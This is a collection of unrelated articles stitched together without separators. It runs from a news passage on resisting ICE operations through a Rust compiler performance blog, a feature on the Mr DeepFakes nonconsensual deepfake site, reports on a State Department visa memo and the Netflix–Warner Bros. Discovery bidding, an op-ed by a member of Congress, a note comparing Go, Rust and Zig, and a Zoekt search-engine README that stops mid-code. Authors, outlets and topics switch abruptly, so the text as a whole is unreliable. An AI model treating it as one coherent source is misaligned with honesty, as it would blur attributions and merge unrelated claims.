On the less risky end, that can mean mutual aid programs to provide legal and other forms of support. But some organizers also want to see more disruption. Jasmine Gripper, a state director of the Working Families Party, was on the call with local officials from LA and Chicago. Gripper told TPM that she envisioned a series of tactics that she described as “not letting ICE be at peace in our city.” That means persuading restaurant owners to refuse to serve immigration agents, following agents around with large bullhorns announcing their presence, and finding out where they’re staying and making loud noises at night.
“How do we disrupt at every level and have peaceful resistance and noncompliance to ICE being in our communities and what best can keep our folks safe?” she said.
Bray, the New York State emergency and homeland security commissioner, told TPM that she’s devoting around half of her schedule to trying to avert a federal escalation and to planning for one if it does happen.
The aggression in federal operations in Chicago shocked her, she said. Federal agents walked around in fatigues, unidentified while wearing masks, as if they were an occupying foreign power. In one incident in Chicago, law enforcement rappelled from a helicopter into a dilapidated apartment building for a showy immigration raid.
“Why? Tell me what the strategic, tactical, operational, requirement for that is?” Bray asked.
It’s illegal to block federal agents from doing their job, Bray said. The overriding risk is that things spiral out of control. In California, federal law enforcement cut off communication with local cops as operations there ramped up. Bray told TPM that the state will do what it can to make sure that those lines of communication stay open, even when that means having police prevent demonstrators from blocking federal agents.
“You get images where people will say to me, ‘well, wait a second, look, isn’t that the NYPD helping?’ No, they’re not helping,” Bray said. “They’re doing crowd control. They’re making sure that there aren’t violent clashes in front of a government building. That’s their job. That’s not cooperation with feds. But, you know, this is gonna test us all.”
[ Josh Kovensky is an investigative reporter for Talking Points Memo, based in New York. He previously worked for the Kyiv Post in Ukraine, covering politics, business, and corruption there.]
It has been more than six months since my last post on the Rust compiler’s performance. In that time I lost one job and gained another. I have less time to work directly on the Rust compiler than I used to, but I am still doing some stuff, while also working on other interesting things.
#142095: The compiler has a data structure called VecCache which is a key-value store used with keys that are densely-numbered IDs, such as CrateNum or LocalDefId. It’s a segmented vector with increasingly large buckets added as it grows. In this PR Josh Triplett optimized the common case when the key is in the first segment, which holds 4096 entries. This gave icount reductions across many benchmark runs, beyond 4% in the best cases.
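To make the shape of that optimization concrete, here is a minimal sketch in Python (not the compiler's actual Rust code) of a segmented key-value store with a fast path for keys that land in the first, fixed-size bucket:

FIRST_BUCKET = 4096  # matches the first-segment size described above


class SegmentedCache:
    """Sketch of a VecCache-like store: dense integer keys, segmented storage."""

    def __init__(self):
        self.first = [None] * FIRST_BUCKET   # flat array for the common case
        self.rest = {}                       # stand-in for the larger, later segments

    def get(self, key):
        # Fast path: most densely-numbered IDs fall in the first segment,
        # so one bounds check and one index replace the general lookup.
        if key < FIRST_BUCKET:
            return self.first[key]
        return self.rest.get(key)

    def insert(self, key, value):
        if key < FIRST_BUCKET:
            self.first[key] = value
        else:
            self.rest[key] = value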
#148040: In this PR Ben Kimock added a fast path for lowering trivial consts. This reduced compile times for the libc crate by 5-15%! It’s unusual to see a change that affects a single real-world crate so much, across all compilation scenarios: debug and release, incremental and non-incremental. This is a great result. At the time of writing, libc is the #12 most popular crate on crates.io as measured by “recent downloads”, and #7 as measured by “all-time downloads”. This change also reduced icounts for a few other benchmarks by up to 10%.
#147293: In the query system there was a value computed on a hot path that was only used within a debug! call. In this PR I avoided doing that computation unless necessary, which gave icount reductions across many benchmark results, more than 3% in the best case. This was such a classic micro-optimization that I added it as an example to the Logging and Debugging chapter of The Rust Performance Book.
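The same micro-optimization shows up in any codebase with leveled logging. A sketch of the pattern in Python (my illustration, not the compiler's code): guard the expensive computation so it only runs when debug logging is actually enabled.

import logging

logger = logging.getLogger("query_system")


def expensive_description(node):
    # Stand-in for the costly computation that was sitting on the hot path.
    return repr(node)


def process(node):
    # Guarding the call means the expensive work is skipped entirely
    # unless debug logging is turned on.
    if logger.isEnabledFor(logging.DEBUG):
        logger.debug("processing %s", expensive_description(node))
    ...  # hot-path work continues here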
#148706 : In this PR dianne optimized the handling of temporary scopes. This reduced icounts on a number of benchmarks, 3% in the best case. It also reduced peak memory usage on some of the secondary benchmarks containing very large literals, by 5% in the best cases.
#143684 : In this PR Nikita Popov upgraded the LLVM version used by the compiler to LLVM 21. In recent years every LLVM update has improved the speed of the Rust compiler. In this case the mean icount reduction across all benchmark results was an excellent 1.70% , and the mean cycle count reduction was 0.90% , but the mean wall-time saw an increase of 0.26% . Wall-time is the true metric, because it’s what users perceive, though it has high variance. icounts and cycles usually correlate well to wall-time, especially on large changes like this that affect many benchmarks, though this case is a counter-example. I’m not quite sure what to make of it; I don’t know whether the wall-time results on the test machine are representative.
#148789: In this PR Mara Bos reimplemented format_args!() and fmt::Arguments to be more space-efficient. This gave lots of small icount wins, and a couple of enormous (30-38%) wins for the large-workspace stress test. Mara wrote about this on Mastodon. She has also written about prior work on formatting on her blog and in this tracking issue. Lots of great reading there for people who love nitty-gritty optimization details, including nice diagrams of how data structures are laid out in memory.
In June I added a new compiler flag -Zmacro-stats that measures how much code is generated by macros. I wrote previously about how I used it to optimize #[derive(Arbitrary)] from the arbitrary crate used for fuzzing.
I also used it to streamline the code generated by #[derive(Reflect)] in Bevy. This derive is used to implement reflection on many types and it produced a lot of code. For example, the bevy_ui crate was around 16,000 lines and 563,000 bytes of source code. The code generated by #[derive(Reflect)] for types within that crate was around 27,000 lines and 1,544,000 bytes. Macro expansion almost quadrupled the size of the code, mostly because of this one macro!
The code generated by #[derive(Reflect)] had a lot of redundancies. I made PRs to remove unnecessary calls, duplicate type bounds (and a follow-up), const _ blocks, closures, arguments, trait bounds, attributes, impls, and finally I factored out some repetition.
After doing this I measured the bevy_window crate. The size of the code generated by #[derive(Reflect)] was reduced by 39%, which reduced cargo check wall-time for that crate by 16%, and peak memory usage by 5%. And there are likely similar improvements across many other crates within Bevy, as well as programs that use #[derive(Reflect)] themselves.
It’s understandable that the generated code was suboptimal. Proc macros aren’t easy to write; there was previously no easy way to measure the size of the generated code; and the generated code was considered good enough because (a) it worked, and (b) the compiler would effectively optimize away all the redundancies. But in general it is more efficient to optimize away redundancies at the generation point, where context-specific and domain-specific information is available, rather than relying on sophisticated optimization machinery further down the compilation pipeline that has to reconstruct information. And it’s just less code to parse and represent in memory.
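As a toy illustration of that principle (my own sketch, not Bevy's actual derive): a generator that deduplicates bounds before emitting them produces less code for the compiler to parse, with no downstream optimizer required.

def generate_impl(type_name, field_types):
    # Naive generation would emit one bound per field, repeating duplicates;
    # deduplicating at the generation point keeps the emitted code small.
    unique_bounds = sorted({f"{ty}: Reflect" for ty in field_types})
    where_clause = ", ".join(unique_bounds)
    return f"impl Reflect for {type_name} where {where_clause} {{ /* ... */ }}"


# Ten fields of only two distinct types produce two bounds, not ten.
print(generate_impl("UiNode", ["f32"] * 8 + ["String"] * 2))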
At RustWeek 2025 I had a conversation with Predrag Gruevski about rustdoc-json (invoked with the --output-format=json flag) and its effects on the performance of cargo-semver-checks. I spent some time looking into it and found one nice win.
#142335 : In this PR I reduced the number of allocations done by rustdoc-json. This gave wall-time reductions of up to 10% and peak memory usage reductions of up to 8%.
I also tried various other things to improve rustdoc-json’s speed, without much success. JSON is simple and easy to parse, and rustdoc-json’s schema for representing Rust code is easy for humans to read. These features are great for newcomers and people who want to experiment. It also means the JSON output is space-inefficient, which limits the performance of heavy-duty tools like cargo-semver-checks that are designed for large codebases. There are some obvious space optimizations that could be applied to the JSON schema, like shortening field names, omitting fields with default values, and interning repeated strings. But these all affect its readability and flexibility.
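As a toy illustration of those kinds of schema optimizations (my own sketch, using made-up field names rather than the real rustdoc-json schema): dropping default-valued fields, shortening keys, and interning repeated strings can shrink the output substantially, at an obvious cost to readability.

import json

# Made-up records standing in for verbose, repetitive JSON output.
items = [
    {"name": f"item{i}", "kind": "function", "visibility": "public", "deprecated": False}
    for i in range(1000)
]


def compact(records):
    # Intern repeated strings into a table, shorten keys, and drop default values.
    strings, index = [], {}

    def intern(s):
        if s not in index:
            index[s] = len(strings)
            strings.append(s)
        return index[s]

    rows = []
    for rec in records:
        row = {"n": intern(rec["name"]), "k": intern(rec["kind"])}
        if rec["visibility"] != "public":
            row["v"] = intern(rec["visibility"])
        if rec["deprecated"]:
            row["d"] = True
        rows.append(row)
    return {"strings": strings, "rows": rows}


before = len(json.dumps(items))
after = len(json.dumps(compact(items)))
print(f"{before} bytes -> {after} bytes")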
The right solution here is probably to introduce a performance-oriented second format for the heavy-duty users. #142642 is a draft attempt at this. Hopefully progress can be made here in the future.
Josh Triplett introduced a new experimental flag, -Zhint-mostly-unused, which can give big compile time wins for people using small fractions of very large crates. This is typically the case for certain large API crates, such as windows, rustix, and aws-sdk-ec2. Read about it here.
Did you know that macOS has a secret setting that can make Rust builds faster? No joke!
Progress since May must be split into two parts, because in July we changed the machine on which the measurements are done.
The first period (2025-05-20 to 2025-06-30) was on the old machine. The second period (2025-07-01 to 2025-12-03) was on the new machine.
The mean wall-time changes were moderate improvements (-3.19% and -2.65%). The mean peak memory usage changes were a wash (+1.18% and -1.50%). The mean binary size changes were small increases (0.45% and 2.56%).
It’s good that wall-times went down overall, even if the other metrics were mixed. There is a slow but steady stream of bug fixes and new features to the compiler, which often hurt performance. In the absence of active performance work the natural tendency for a compiler is to get slower, so I view even small improvements as a win.
The new machine reduced wall-times by about 20%. It’s worth upgrading your hardware, if you can!
For Patrizia Schlosser, it started with an apologetic call from a colleague. “I’m sorry but I found this. Are you aware of it?” He sent over a link, which took her to a site called Mr DeepFakes. There, she found fake images of herself, naked, squatting, chained, performing sex acts with various animals. They were tagged “Patrizia Schlosser sluty FUNK whore” (sic).
“They were very graphic, very humiliating,” says Schlosser, a German journalist for Norddeutscher Rundfunk (NDR) and Funk . “They were also very badly done, which made it easier to distance myself, and tell myself they were obviously fake. But it was very disturbing to imagine somebody somewhere spending hours on the internet searching for pictures of me, putting all this together.”
The site was new to Schlosser, despite her previous high-profile investigations into the porn industry. “I’d never heard of Mr DeepFakes – a porn site entirely dedicated to fake porn videos and photos. I was surprised by how big it was – so many videos of every celebrity you know.” Schlosser’s first reaction on seeing herself among them was to brush it aside. “I tried to push it to the back of my mind, which was really a strategy of not dealing with it,” she says. “But it’s strange how the brain works. You know it’s fake but still you see it. It’s not you but also it is you. There you are with a dog and a chain. You feel violated but confused. At some point, I decided: ‘No. I’m angry. I don’t want those images out there.’”
Schlosser’s subsequent documentary for NDR’s STRG_F programme did succeed in getting the images removed. She also tracked down the young man who had created and posted them – even visiting his home and speaking to his mother. (The perpetrator himself wouldn’t come out of his bedroom.) However, Schlosser was unable to identify “Mr DeepFakes” – or whoever was behind the site, despite enlisting the help of Bellingcat, the online investigative journalism collective. Bellingcat’s Ross Higgins was on the team. “My background is investigating money laundering,” he says. “I looked at the structure of the website and it was using the same internet service providers (ISPs) as proper serious organised criminals.” The ISPs suggested links to the Russian mercenary group Wagner, and individuals named in the Panama Papers . The ads it carried included ones for apps owned by Chinese technology companies, which allowed China’s government access to all customer data. “I made the presumption that this was all much too sophisticated to be a site of hobbyists,” says Higgins.
It turned out that’s exactly what it was.
The story of Mr DeepFakes, the world’s largest, most notorious nonconsensual deepfake porn site, is really the story of AI porn itself – the very term “deepfake” is believed to have come from its originator. A “ground zero” for AI-generated pornography, its pages – which have been viewed more than 2bn times – have depicted countless female celebrities, politicians, European princesses, wives and daughters of US presidents, being kidnapped, tortured, shaved, bound, mutilated, raped and strangled. Yet all this content (which would take more than 200 days to watch) was just the site’s “shop window”. Its true heart, its “engine room”, was its forum. Here, anyone wanting deepfakes created of someone they knew (a girlfriend, sister, classmate or colleague) could find someone willing to make them to order for the right price. It was also a “training ground”, a technical hub where “hobbyists” taught one another, shared tips, posted academic papers and “problem-solved”. (One recurring problem was how to deepfake without a good “dataset”. This means when you’re trying to deepfake someone you don’t have many pictures of – so not a celebrity, but maybe someone you know whose social media you’ve screengrabbed.)
The film-maker and activist Sophie Compton spent many hours monitoring Mr DeepFakes while researching the award-winning 2023 documentary Another Body (available on iPlayer). “Looking back, I think that site played such an instrumental role in the proliferation of deepfakes overall,” she says. “I really think that there’s a world in which the site didn’t get made, wasn’t allowed to be made or was shut down quickly, and deepfake porn is just a fraction of the issue that we have today. Without that site, I don’t think it would have exploded in the way it did.”
In fact, that scenario was entirely possible. The origins of Mr Deepfakes stretch back to 2017-18 when AI porn was just beginning to build on social media sites such as Reddit. One anonymous Redditor and AI porn “pioneer” who went by the name of “deepfakes” (and is thus credited with coining the term) gave an early interview to Vice about its potential. Shortly after, though, in early 2018, Reddit banned deepfake porn from its site. “We have screenshots from their message boards at that time and the deepfake community, which was small, was freaking out and jumping ship,” says Compton. This is when Mr DeepFakes was created, with the early domain name dpfks.com. The administrator carried the same username – dpfks – and was the person who advertised for volunteers to work as moderators, and posted rules and guidelines, as well as deepfake videos and an in-depth guide to using software for deepfake porn.
“What’s so depressing about reading the messages and seeing the genesis is realising how easily governments could have stopped this in its tracks,” says Compton. “The people doing it didn’t believe they were going to be allowed free rein. They were saying: ‘They’re coming for us!’, ‘They’re never going to let us do this!’ But as they continued without any problems at all, you see this growing emboldenment. Covid added to the explosion as everyone stopped moderating content. The output was violent – it was about degrading someone completely. The celebrities that were really popular were often really young – Emma Watson, Billie Eilish, Millie Bobby Brown.” (Greta Thunberg is another example here.)
Who was behind it? From time to time, Mr DeepFakes gave anonymous interviews. In a 2022 BBC documentary, Deepfake Porn: Could You Be Next?, the site’s “owner” and “web developer”, going by the pseudonym “deepfakes”, made the argument that consent from the women wasn’t required as “it’s a fantasy, it’s not real”.
Was money their motivation? Mr DeepFakes ran ads and had a premium membership paid in cryptocurrency – in 2020, one forum mentions that it made between $4,000 and $7,000 a month. “There was a commercial aspect,” says Higgins. “It was a side hustle, but it was more than that. It gave this notoriety.”
At one point, the site “posted 6,000 pictures of AOC’s [the US politician Alexandria Ocasio-Cortez’s] face in order that people could make deepfake pornography of her,” says Higgins. “It’s insane. [There were] all these files of YouTubers and politicians. What it’s saying is that if you’re a woman in this world you can only achieve so much because if you put your head above the parapet, if you have the temerity to do anything publicly, you can expect your image to be used in the most degrading way possible for personal profit.
“The most affecting thing for me was the language used about women on that site,” he continues. “We had to change it for our online report because we didn’t want it to be triggering, but this is pure misogyny. Pure hatred.”
This April, investigators began to believe that they had found Mr DeepFakes and sent emails to their suspect.
On 4 May, Mr DeepFakes shut down. A notice on its homepage blamed “data loss” caused by the withdrawal of a “critical service provider”. “We will not be relaunching,” it continued. “Any website claiming this is fake. This domain will eventually expire and we are not responsible for future use. This message will be removed in about a week.”
Mr DeepFakes is finished – but according to Compton, this could have happened so much sooner. “All the signs were there,” she says. The previous year, in April 2024, when the UK government announced plans to criminalise the creation and sharing of deepfake sexual abuse material , Mr DeepFakes responded by immediately blocking access to UK users. (The plans were later shelved when the 2024 election was called.) “It showed that ‘Mr DeepFakes’ was obviously not so committed that there was nothing governments could do,” says Compton. “If it was going to become too much of a pain and a risk to run the site, then they weren’t going to bother.”
But deepfake porn has become so popular, so mainstream, that it no longer requires a “base camp”. “The things that those guys prided themselves on learning how to do and teaching others are now so embedded, they’re accessible to anyone on apps at the click of the button,” says Compton.
And for those wanting something more complex, the creators, the self-styled experts who once lurked on its forum, are now out there touting for business. Patrizia Schlosser knows this for sure. “As part of my research, I went undercover and reached out to some of the people on the forums, asking for a deepfake of an ex-girlfriend,” says Schlosser. “Although it’s often claimed the site was only about celebrities, that wasn’t true. The response was, ‘Yeah, sure …’
“After Mr DeepFakes shut down, I got an automatic email from one of them which said: ‘If you want anything made, let me know … Mr DeepFakes is down – but of course, we keep working.’”
In the UK and Ireland, Samaritans can be contacted on freephone 116 123, or email jo@samaritans.org or jo@samaritans.ie. In the US, you can call or text the 988 Suicide & Crisis Lifeline at 988 or chat at 988lifeline.org . In Australia, the crisis support service Lifeline is 13 11 14. Other international helplines can be found at befrienders.org
In the UK, Rape Crisis offers support for rape and sexual abuse on 0808 802 9999 in England and Wales, 0808 801 0302 in Scotland , or 0800 0246 991 in Northern Ireland . In the US, Rainn offers support on 800-656-4673. In Australia, support is available at 1800Respect (1800 737 732). Other international helplines can be found at ibiblio.org/rcip/internl.html
The Harry S. Truman Federal Building, headquarters of the U.S. Department of State, in a 2024 file photo. (Kevin Dietsch/Getty Images)
The State Department is instructing its staff to reject visa applications from people who worked on fact-checking, content moderation or other activities the Trump administration considers "censorship" of Americans' speech.
The directive, sent in an internal memo on Tuesday, is focused on applicants for H-1B visas for highly skilled workers, which are frequently used by tech companies, among other sectors. The memo was first reported by Reuters ; NPR also obtained a copy.
"If you uncover evidence an applicant was responsible for, or complicit in, censorship or attempted censorship of protected expression in the United States, you should pursue a finding that the applicant is ineligible" for a visa, the memo says. It refers to a policy announced by Secretary of State Marco Rubio in May restricting visas from being issued to "foreign officials and persons who are complicit in censoring Americans."
The Trump administration has been highly critical of tech companies' efforts to police what people are allowed to post on their platforms and of the broader field of trust and safety, the tech industry's term for teams that focus on preventing abuse, fraud, illegal content, and other harmful behavior online.
President Trump was banned from multiple social media platforms in the aftermath of his supporters' attack on the Capitol on Jan. 6, 2021. While those bans have since been lifted, the president and members of his administration frequently cite that experience as evidence for their claims that tech companies unfairly target conservatives — even as many tech leaders have eased their policies in the face of that backlash .
Tuesday's memo calls out H-1B visa applicants in particular "as many work in or have worked in the tech sector, including in social media or financial services companies involved in the suppression of protected expression."
It directs consular officers to "thoroughly explore" the work histories of applicants, both new and returning, by reviewing their resumes, LinkedIn profiles, and appearances in media articles for activities including combatting misinformation, disinformation or false narratives, fact-checking, content moderation, compliance, and trust and safety.
"I'm alarmed that trust and safety work is being conflated with 'censorship'," said Alice Goguen Hunsberger, who has worked in trust and safety at tech companies including OpenAI and Grindr.
"Trust and safety is a broad practice which includes critical and life-saving work to protect children and stop CSAM [child sexual abuse material], as well as preventing fraud, scams, and sextortion. T&S workers are focused on making the internet a safer and better place, not censoring just for the sake of it," she said. "Bad actors that target Americans come from all over the world and it's so important to have people who understand different languages and cultures on trust and safety teams — having global workers at tech companies in [trust and safety] absolutely keeps Americans safer."
In a statement, a State Department spokesperson who declined to give their name said the department does not comment on "allegedly leaked documents," but added: "the Administration has made clear that it defends Americans' freedom of expression against foreigners who wish to censor them. We do not support aliens coming to the United States to work as censors muzzling Americans."
The statement continued: "In the past, the President himself was the victim of this kind of abuse when social media companies locked his accounts. He does not want other Americans to suffer this way. Allowing foreigners to lead this type of censorship would both insult and injure the American people."
First Amendment experts criticized the memo's guidance as itself a potential violation of free speech rights.
"People who study misinformation and work on content-moderation teams aren't engaged in 'censorship'— they're engaged in activities that the First Amendment was designed to protect. This policy is incoherent and unconstitutional," said Carrie DeCell, senior staff attorney and legislative advisor at the Knight First Amendment Institute at Columbia University, in a statement.
Even as the administration has targeted those it claims are engaged in censoring Americans, it has also tightened its own scrutiny of visa applicants' online speech .
On Wednesday, the State Department announced it would require H-1B visa applicants and their dependents to set their social media profiles to "public" so they can be reviewed by U.S. officials.
NPR's Bobby Allyn and Michele Kelemen contributed reporting.
Photo credit: Farah Abdi Warsameh/Associated Press // New York Times
On Tuesday, President Trump called my friends and me “garbage.”
This comment was only the latest in a series of remarks and Truth Social posts in which the president has demonized and spread conspiracy theories about the Somali community and about me personally. For years, the president has spewed hate speech in an effort to gin up contempt against me. He reaches for the same playbook of racism, xenophobia, Islamophobia and division again and again. At one 2019 rally, he egged on his crowd until it chanted “send her back” when he said my name .
Mr. Trump denigrates not only Somalis but so many other immigrants, too, particularly those who are Black and Muslim. While he has consistently tried to vilify newcomers, we will not let him silence us. He fails to realize how deeply Somali Americans love this country. We are doctors, teachers, police officers and elected leaders working to make our country better. Over 90 percent of Somalis living in my home state, Minnesota, are American citizens by birth or naturalization. Some even supported Mr. Trump at the ballot box.
“I don’t want them in our country,” the president said this week. “Let them go back to where they came from.”
Somali Americans remain resilient against the onslaught of attacks from the White House. But I am deeply worried about the ramifications of these tirades. When Mr. Trump maligns me, it increases the number of death threats that my family, staff members and I receive. As a member of Congress, I am privileged to have access to security when these threats arise. What keeps me up at night is that people who share the identities I hold — Black, Somali, hijabi, immigrant — will suffer the consequences of his words, which so often go unchecked by members of the Republican Party and other elected officials. All Americans have a duty to call out this hateful rhetoric when we hear it.
The president’s dehumanizing and dangerous attacks on minority immigrant communities are nothing new. When he first ran for president a decade ago, he launched his campaign with claims that he was going to pause Muslim immigration to this country. He has since falsely accused Haitian migrants of eating pets and referred to Haiti and African nations as “shithole” countries. He has accused Mexico of sending rapists and drug peddlers across our border. It is unconscionable that he fails to acknowledge how this country was built on the backs of immigrants and mocks their ongoing contributions.
While the president wastes his time attacking my community, my state, my governor and me, the promises of economic prosperity he made in his run for president last year have not come to fruition. Prices have not come down; in many cases, they have risen. His implementation of tariffs has hurt farmers and small business owners. His policies have only worsened the affordability crisis for Americans. And now, with Affordable Care Act tax credits set to expire, health care costs for American households are primed to skyrocket, and millions of people risk losing their coverage under his signature domestic policy bill.
The president knows he is failing, and so he is reverting to what he knows best: trying to divert attention by stoking bigotry.
When I was sworn into Congress in 2019, my father turned to me and expressed bewilderment that the leader of the free world was picking on a freshman member of Congress, one out of 535 members of the legislative body. The president’s goal may have been to try to tear me down, but my community and my constituents rallied behind me then, just as they are now.
I often say that although Minnesota may be cold, the people here have warm hearts. Minnesota is special. That is why when so many Somalis arrived in this country, they chose the state as home. I am deeply grateful to the people of Minnesota for the generosity, hospitality and support they have shown to every immigrant community in our state.
We will not let Mr. Trump intimidate or debilitate us. We are not afraid. After all, Minnesotans not only welcome refugees, they also sent one to Congress.
Netflix has submitted the highest bid to date for Warner Bros. Discovery’s studio and streaming assets, according to people familiar with the secretive bidding process.
Netflix’s most recent offer, submitted on Thursday, valued the Warner Bros. studio, HBO Max streaming service and related parts of the company at around $28 per share, sources said.
Paramount also submitted a new bid on Thursday, closer to $27 per share, one of the sources added.
The two offers aren’t apples-to-apples, however, because Paramount has been trying to buy all of Warner Bros. Discovery, including CNN and other cable channels, while Netflix and another bidder, Comcast, have only shown interest in the studio and streaming assets.
The mega-media bidding war has intensified in recent days, captivating a wide swath of Hollywood and garnering attention from the Trump White House. Iconic brands like HBO and DC Comics hang in the balance.
Representatives for the companies involved have declined to comment. But leaks out of what is supposed to be a confidential process suggest that Netflix now has the pole position.
Paramount certainly perceives it that way; the company’s attorneys wrote to WBD CEO David Zaslav expressing “grave concerns” about the auction process.
Specifically, Paramount’s attorneys charged that WBD has “embarked on a myopic process with a predetermined outcome that favors a single bidder,” meaning Netflix.
Analysts said the letter could be a precursor to a hostile-takeover play by Paramount, which has moved aggressively in recent months under new CEO David Ellison’s leadership.
Late Thursday, Bloomberg reported that WBD and Netflix have entered exclusive talks.
Ellison kickstarted the auction process earlier in the fall by submitting multiple bids to WBD CEO David Zaslav and the company’s board.
Analysts at the time predicted that a bidding war would break out, and that’s exactly what has happened, given that famed movie and TV studios rarely come onto the market.
Zaslav officially put up the for-sale sign in October. At the same time, he said that WBD’s previously announced plan to split the company into two publicly traded halves would continue to be pursued.
The WBD board had been under pressure to do something, since the company’s stock plummeted after it was formed through a 2022 merger, from roughly $25 a share to a low of $7.52.
The split plan helped to rejuvenate WBD’s shares earlier this year, and then word of Paramount’s offers sent the stock skyrocketing back toward $25.
Sources in Ellison’s camp have emphasized that Paramount would be disciplined in its pursuit of the Warner assets.
Meanwhile, people in Zaslav’s camp have argued that the proposed split was the best way to realize the value of all of WBD.
If the split still takes effect next year, the Warner Bros. half would house HBO Max and the movie studio, and the Discovery Global half would house CNN and other cable channels.
Paramount may have been trying to get ahead of the split by making unsolicited bids for the whole company.
Ellison’s pursuit is audacious, to be sure: Paramount’s market cap is currently one-fourth the size of WBD’s market cap.
But Ellison and his management team have been moving fast to revitalize Paramount and disprove skeptics across Hollywood.
It’s impossible to make sense of the WBD bidding war without understanding the “Trump card.”
Ellison and Paramount are perceived to have a mutually beneficial relationship with President Trump and the White House — and thus an advantage in getting any deal approved by the Trump administration. “That’s the Trump card,” an Ellison adviser remarked to CNN in October.
Past administrations proudly insisted that agencies like the Department of Justice, which enforces antitrust law, were independent of the president. Trump has replaced those norms with a new, overtly transactional approach.
Trump has repeatedly praised Ellison and his father Larry, Oracle’s executive chairman, who is a key player in Trump’s dealings with TikTok.
“They’re friends of mine. They’re big supporters of mine,” the president said in mid-October.
Numerous Republican lawmakers have also cheered the Ellison takeover of CBS and the rest of Paramount, especially the installation of Bari Weiss as editor in chief of CBS News.
Ellison has been both credited and criticized for forging a relationship with Trump’s inner circle this year despite donating nearly $1 million to Joe Biden’s reelection campaign last year.
Just a couple of weeks ago, Ellison landed an invitation to Trump’s White House dinner for Saudi Crown Prince Mohammed bin Salman.
What some have seen as savvy business practices, others have seen as media capitulation. And Ellison has stayed mostly quiet about the matter.
On Wednesday he was scheduled to appear at the DealBook Summit, an annual conference hosted by The New York Times in Manhattan. But he withdrew from the summit amid the negotiations with WBD and was later spotted back in Washington, D.C. for talks with officials there.
During the WBD bidding process, Paramount executives have bluntly argued that their offer will pass muster with Trump administration regulators while rival offers will not.
After all, any proposed sale could be held up for months, and even years, in Washington, either by Trump loyalists carrying out his wishes or by bureaucrats with genuine objections to media consolidation.
But Trump does not get a literal veto. When the Justice Department in 2017 sued to stop AT&T’s merger with Time Warner, a forerunner to WBD, the companies fought the case in court and prevailed.
Some Wall Street analysts have asserted that Netflix may be willing to stomach a similar legal battle.
Plus, Washington is not the only regulatory battleground that media companies have to worry about.
A WBD sale, in whole or in part, would face scrutiny in the United Kingdom, the European Union and some Latin American countries. Sources previously told CNN that the perception of Trump clearing the way for the Ellisons in the US could hurt them in other markets.
Media reports about Netflix emerging as the frontrunner for WBD’s studio and streaming assets have prompted some Republican elected officials to raise alarms about the prospective combination.
“Learning about Netflix’s ambition to buy its real competitive threat — WBD’s streaming business — should send alarm to antitrust enforcers around the world,” Sen. Mike Lee wrote on X. “This potential transaction, if it were to materialize, would raise serious competition questions — perhaps more so than any transaction I’ve seen in about a decade.”
A recent Bank of America analyst report put it this way: “If Netflix acquires Warner Bros., the streaming wars are effectively over. Netflix would become the undisputed global powerhouse of Hollywood beyond even its currently lofty position.”
Thoughts on Go vs. Rust vs. Zig (via): thoughtful commentary on Go, Rust, and Zig by Sinclair Target. I haven't seen a single comparison that covers all three before and I learned a lot from reading this.
One thing that I hadn't noticed before is that none of these three languages implement class-based OOP.
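To make that concrete, here is a minimal Go sketch of what "no class-based OOP" looks like in practice: data lives in plain structs, behaviour is attached through methods, and polymorphism comes from implicitly satisfied interfaces rather than a class hierarchy (Rust leans on traits for the same job, Zig on plain structs and comptime).

package main

import "fmt"

// No classes and no inheritance: data lives in a plain struct,
// behaviour is attached through methods.
type Circle struct{ Radius float64 }

func (c Circle) Area() float64 { return 3.14159 * c.Radius * c.Radius }

// Polymorphism comes from interfaces, which are satisfied implicitly:
// Circle never declares that it implements Shape.
type Shape interface{ Area() float64 }

func main() {
	var s Shape = Circle{Radius: 2} // no "extends", no constructors
	fmt.Println(s.Area())           // 12.56636
}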
Posted 5th December 2025 at 4:28 am
"Zoekt, en gij zult spinazie eten" - Jan Eertink
("seek, and ye shall eat spinach" - My primary school teacher)
Zoekt is a text search engine intended for use with source code. (Pronunciation: roughly as you would pronounce "zooked" in English)
Note: This has been the maintained source for Zoekt since 2017, when it was forked from the original repository github.com/google/zoekt .
Zoekt supports fast substring and regexp matching on source code, with a rich query language that includes boolean operators (and, or, not). It can search individual repositories, and search across many repositories in a large codebase. Zoekt ranks search results using a combination of code-related signals like whether the match is on a symbol. Because of its general design based on trigram indexing and syntactic parsing, it works well for a variety of programming languages.
The two main ways to use the project are the command-line tools, for indexing and searching locally, and the index server plus web server, for indexing and searching many repositories at scale; both are described below.
For more details on Zoekt's design, see the docs directory .
go get github.com/sourcegraph/zoekt/
Note: It is also recommended to install Universal ctags, as symbol information is a key signal in ranking search results. See ctags.md for more information.
Zoekt supports indexing and searching repositories on the command line. This is most helpful for simple local usage, or for testing and development.
go install github.com/sourcegraph/zoekt/cmd/zoekt-git-index
$GOPATH/bin/zoekt-git-index -index ~/.zoekt /path/to/repo
go install github.com/sourcegraph/zoekt/cmd/zoekt-index
$GOPATH/bin/zoekt-index -index ~/.zoekt /path/to/repo
go install github.com/sourcegraph/zoekt/cmd/zoekt
$GOPATH/bin/zoekt 'hello'
$GOPATH/bin/zoekt 'hello file:README'
Zoekt also contains an index server and web server to support larger-scale indexing and searching of remote repositories. The index server can be configured to periodically fetch and reindex repositories from a code host. The webserver can be configured to serve search results through a web UI or API.
go install github.com/sourcegraph/zoekt/cmd/zoekt-indexserver
echo YOUR_GITHUB_TOKEN_HERE > token.txt
echo '[{"GitHubOrg": "apache", "CredentialPath": "token.txt"}]' > config.json
$GOPATH/bin/zoekt-indexserver -mirror_config config.json -data_dir ~/.zoekt/
This will fetch all repos under 'github.com/apache', then index the repositories. The indexserver takes care of periodically fetching and indexing new data, and cleaning up logfiles. See config.go for more details on this configuration.
go install github.com/sourcegraph/zoekt/cmd/zoekt-webserver
$GOPATH/bin/zoekt-webserver -index ~/.zoekt/
This will start a web server with a simple search UI at http://localhost:6070 . See the query syntax docs for more details on the query language.
If you start the web server with -rpc, it exposes a simple JSON search API at http://localhost:6070/api/search .
The JSON API supports advanced features, including the timing of result flushing (FlushWallTime option), BM25 relevance scoring (UseBM25Scoring option), and the number of context lines returned around matches (NumContextLines option).
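As a quick smoke test of that endpoint, a small Go program like the one below can post a query and print the raw JSON response. The request body is only a sketch: the field names used here ("Q", "Opts", "NumContextLines") are assumptions based on the option names above, so check the query syntax and API docs for the exact request schema.

package main

import (
	"bytes"
	"fmt"
	"io"
	"net/http"
)

func main() {
	// Hypothetical request body: "Q", "Opts" and "NumContextLines" are
	// assumed field names based on the options mentioned above; consult
	// the API documentation for the real schema.
	body := []byte(`{"Q": "hello file:README", "Opts": {"NumContextLines": 2}}`)

	resp, err := http.Post("http://localhost:6070/api/search",
		"application/json", bytes.NewReader(body))
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

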